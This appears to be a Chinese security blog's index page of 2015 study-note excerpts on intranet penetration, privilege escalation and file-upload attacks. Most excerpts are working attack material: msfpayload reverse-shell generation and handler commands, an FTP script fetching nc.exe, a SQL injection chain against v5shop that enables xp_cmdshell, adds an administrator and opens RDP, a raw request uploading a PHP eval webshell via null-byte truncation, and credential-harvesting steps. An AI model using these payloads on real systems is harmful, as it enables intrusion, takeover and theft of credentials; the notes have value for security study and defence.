内网渗透

Metasploit的Meterpreter的生成

Metasploit的Meterpreter的生成
Windows Metermsfpayload windows/meterpreter/reverse_http LHOST=192.168.21.131 LPORT=10516 X > shell.exeuse exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.174.131 set LPORT 9888 exploit -jLINUX Metermsfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.149 LPORT=4444 R| msfencode -t elf -e x86/shikata_ga_nai >> /root/Desktop/testuse exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set LHOST 192.168.174.131 set LPORT 9888 exploit... 继续阅读 »
学习笔记

内外渗透技巧

内外渗透技巧
能执行命令,但是不能直接上传文件怎么破?         window:ftp下载-wget.exe文件使用    ftp -s:d:\ftp.txt下载文件:    echo open xxx.xxx.xxx.xxx>>d:\ftp.txt    echo admin>>d:\ftp.txt    echo 123456>>d:\ftp.txt    echo get nc.exe d:\nc.exe>>d:\f.txt    echo bye >>d:\ftp.txt         Linux: wget下载 LCX转其他服务器的端口... 继续阅读 »
内网渗透

2015-7-29 内网渗透-进入内网

2015-7-29 内网渗透-进入内网
1、打通渠道,进入目标网络VPN进入目标网络各种代理:ss5的代理SSH建立SS5ssh -C -g -D 2333 root@我的IPNC 没有-e 绑定执行bash的时候怎么破?端口复用:适合场景,目标只开了80,我们要怎么搞了呢? reDuh:  提供了 jsp , asp ,php 三类复用工具EW.exe 端口转发:融合NC和Lcx的功能(rootkiter.com )下载2、内网探测Nmap  探测内网Nbtscan Nslookup -qt=txt 或 -qt=mx 或 -qt=Aarp -a3、内网嗅探caintcpdump  4、imcp后门   nice后门2、欺骗的艺术案例:信息探测+邮件服务器+溢出传说中的水坑攻击... 继续阅读 »
内网渗透

2015-7-29 内网渗透-信息收集

2015-7-29 内网渗透-信息收集
怎么发现内网?arp -a 或者 netstat -ano 或者 net view 或者 nslookup baidu.com net view 查看内网情况ifonfig /all [注意看:Primary Dns Suffix ,可能得到一个域xxxx-cc.com,ping一下得到与服务器IP]net config workstation 会显示本机计算机名和管理员用户名,工作站的域DNS名称及登录到的域net localgroup administrators - 查看本机在域里里面的角色net user /domain - 查看域里面的用户net group "domain admins" /domain 信息收集       > 操作系统信息收集           windows: Cain爆注册表,WCE , MIMIkatz,Pwdum7          Linux : /etc/passwd数据库信息收集       >各种web的配置文件中间件       各种中间件的信息浏览器信息收集      1、发现管理员浏览看过的其他内网的IP      2、发现浏览器保存的账号密码和没有过期的Cookie第三方应用       >Rsync           1、配置文件 :/etc/rsyncd.conf       >Openvpn           1、配置文件 :  /etc/ppp/chap-secrets       >ftp           1、配置文件        >SSH           1、su密码记录操作记录    >Linux           >cat .bash_history | more            >cat .mysql_history           >ls -al 寻找.vnc  .ssh等           > last 中间件的日志,系统日志 [last去看,登陆最频繁的IP,如果拿下它,可能会获得一大批服务器的账号密码。]           >SSH信任连接[寻找密钥,配置的无密码登陆文件]    >Windows         >浏览器记录         >最近访问文件敏感文档     .bat、.sh  .bt    .doc   .xls   .conf   .vnc 文件... 继续阅读 »
学习笔记

2015-7-28 提权

2015-7-28 提权
1、系统漏洞提权微软: MS08067 MS: Micosoft的缩写08: 表示年份,即 2008年发布的漏洞067: 表示顺序,即当年发布的第67个漏洞2、如何知道使用哪个EXP?使用systeminfo查看补丁目录,查看补丁记录,判断哪个补丁没打,使用对应的EXP进行提权Windows Linux系统提权 用各种EXP打3、数据库提权原理:启动数据库的账号是高权限账号,使用数据库执行系统命令相当于使用高权限账号使用系统命令,提权也属于权限继承类提权。MYSQL: UDF 提权适用场景:Windows 2000,XP,Win2003能够对数据库表INSERT 和 DELETE权限MYSQL最好默认启动权限是system (Linux默认是mysql用户)UDF 提权方法:1、获取当前MySQL的一个数据库连接信息,通常包含地址、端口、账号、密码、库名等五个信息。2、上传UDF提权用的DLL,并进行数据库连接。3、连接成功后,导出DLL文件。select * from outfile 'aaaa.dll'4、使用SQL语句创建自定义函数 5、通过SQL语句调用创建的函数6、删除函数和dll4. DLL劫持提权  每一个文件在开始运行时都要寻找各种它需要的DLL(动态链接库),来满足程序的功能和需求。但是有一个特性,就是每个EXE运行前都要寻找一个名为LPK.DLL的文件,并执行它。优先搜寻当前目录下的DLL加载,然后再到系统目录下去加载:LPK.dll5. python交互式bash... 继续阅读 »
学习笔记

v5shop四句SQL话搞定服务器权限

v5shop四句SQL话搞定服务器权限
注入点:http://192.168.16.102/weblogin/login.aspx  用户名框v5shop版本:SOMS V8.0(标准版) Powered By v5shop.com }','',''); exec master..sp_configure 'show advanced options',1; RECONFIGURE; exec master..sp_configure 'xp_cmdshell',1; --           //看去xp_cmdshell}','',''); exec master..xp_cmdshell "net user test test /add"  --       //添加用户}','',''); exec master..xp_cmdshell "net localgroup administrators test /add "  --    //将用户添加到管理员组}','',''); exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;  --                       //开启3389... 继续阅读 »
学习笔记

巴西烤肉提权+开2003的3389

巴西烤肉提权+开2003的3389
需要三个文件:1.exe - 巴西烤肉3389.bat - 2003的3389开启bat文件MS11_08.exe - K8的添加管理员工具补丁名:kb952004 CMD路径: C:\Windows\System32\Cmd.exe 加用CMD参数: /c C:\Inetpub\down\upfile\affix\MS11_80.exe    添加用户:k8team - k8team               /c C:\Inetpub\down\upfile\affix\1.exe 2003open3389.bat    - 开3389端口... 继续阅读 »
学习笔记

GPU破解神器Hashcat使用简介

GPU破解神器Hashcat使用简介
  攻击模式-a 0 = Straight   (字典破解)1 = Combination  (组合破解)2 = Toggle-Case3 = Brute-force  (掩码暴力破解)4 = Permutation   (组合破解)5 = Table-Lookup-m 0 =>MD5100 =>SHA1300 = MySQL4.1/MySQL5400 = phpass, MD5(Wordpress), MD5(phpBB3), MD5(Joomla)2500 = WPA/WPA2 - WIFI的密码key1000 = NTLM Windows的Hash1400 = SHA256 使用字典破解MD5:oclHashcat-plus64.exe --hash-type 0 --attack-mode 0 d:md5.txt d:dict1.txt d:dict2.txt参看:http://xiao106347.blog.163.com/blog/static/215992078201451082547241/... 继续阅读 »
学习笔记

上传漏洞练习与记录

上传漏洞练习与记录
1. fck 2.2 htaccess文件攻击访问地址:http://ipaddress/fck/editor/filemanager/browser/default/browser.html?Connector=connectors/php/connector.php上传一个.htaccess 文件,内容:<FilesMatch "ns">SetHandler application/x-httpd-php</FilesMatch>然后上传文件名包括“ns”的文件,就会以php文件解析并执行。2. bluecms文件头检测绕过文件第一行填写:gif89a 抓包:修改Content-Type: 为 image/gif 3. fck 2.6.30x00截断绕过乌云EXP:http://www.wooyun.org/bugs/wooyun-2011-01684POST /fck6/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=Image&CurrentFolder=a42d.php%00.gif HTTP/1.1 Host: 192.168.16.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.16.199/fck6/editor/filemanager/browser/default/frmupload.html Cookie: CNZZDATA3842235=cnzz_eid%3D812147584-1437879170-null%26ntime%3D1437879170; Commerce-UserCookie1101=lv=1999-1-1 0:00:00&mra=07/26/2015 14:17:29; Commerce-UserCookie1100=lv=1999-1-1 0:00:00&mra=07/26/2015 14:22:51; ECS[visit_times]=1; ECS[username]=god; ECS[user_id]=4; ECS[password]=8316a1639d78617a0c777f49836ba366; SLnewses=1; PHPSESSID=8fab4d8b6db945e02bce776ba88bbf50; oIFFygyhwvusername=phpcms; oIFFygyhwvauth=VThRU1MPB15XAglVUVIAXFMCBgJRBQRUBlIBBlEKDwxXBg%3D%3D; oIFFygyhwvcookietime=0 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------5151972426418 Content-Length: 234 -----------------------------5151972426418 Content-Disposition: form-data; name="NewFile"; filename="poc.gif" Content-Type: application/octet-stream GIF89a <?php eval($_POST[a]) ?> -----------------------------5151972426418--注意三点:POST 的地址中用了%00截断.POST数据中 GIF89a用来绕过内容检测.filename 中poc.gif 需要是gif绕过后缀名检测.4. IIS PUT直接GET shell桂林老兵的工具直接写,OPTIONS 请求判断能进行的操作PUT 上传一个txt文件MOVE  到一个asp文件5. fck 2.2 asp版,asa,cer后缀绕过文件上传攻击名单列表绕过:漏洞地址:http://192.168.16.199/fck/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp直接上传asa ,cer 后缀的文件asa后缀:6.... 继续阅读 »
学习笔记

2015-07-26 文件上传漏洞

2015-07-26 文件上传漏洞
介绍     利用上传漏洞可以把ASP,PHP等格式的木马直接上传至网站目录内,一旦上传成功,可以立刻得到WEBSHELL权限一种比注入更有杀伤力的漏洞上传漏洞类型: 无检测直接上传文件IIS PUT上传检测绕过客户端JS绕过MIME类型检测绕过黑名单列表绕过特殊文件名绕过【asa,cer,ashx,cdx,php5等,在Windows中,xx.jpg[空格] 或者xx.jpg.  这两类文件都不允许存在,若这样命名,Windows会自动去除空格或点。在向一台windows主机上传数据时,可以抓包修改文件名,在后面加个空格或点,试图绕过黑名单,若上传成功,最后的点或空格都会被消除,这样就可得到shell。 】利用%00,或其他的截断绕过利用服务器解析漏洞【IIS: test.asp;1.jpg , test.asp/1.jpg 默认的xx.asa, xx.cer, xx.cdx | Apache:test.php.xxx | Nginx: xx.jpg/1.php】利用.htaccess文件可修改上传文件【后台修改此文件,添加上传类型】编辑器漏洞   各种编辑器,各种版本,二次上传、直接上传、配合解析漏洞上传、截断上传。上传配合解析IIS以asp明明的文件夹下的文件以asp代码执行。(IIS6)分号;截断,导致错误解析test.asp;jpg或test.asp;.jpg(IIS6)IIS6 默认的可执行文件除了 asp 还包含这三种Apacheconf/mime.types保存了已知的文件类型,按照文件的扩展名从后往前的顺序进行解析。test.php.x1.x2.x3Nginx在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。(IIS 7.0/IIS 7.5/Nginx <=0.8.37)... 继续阅读 »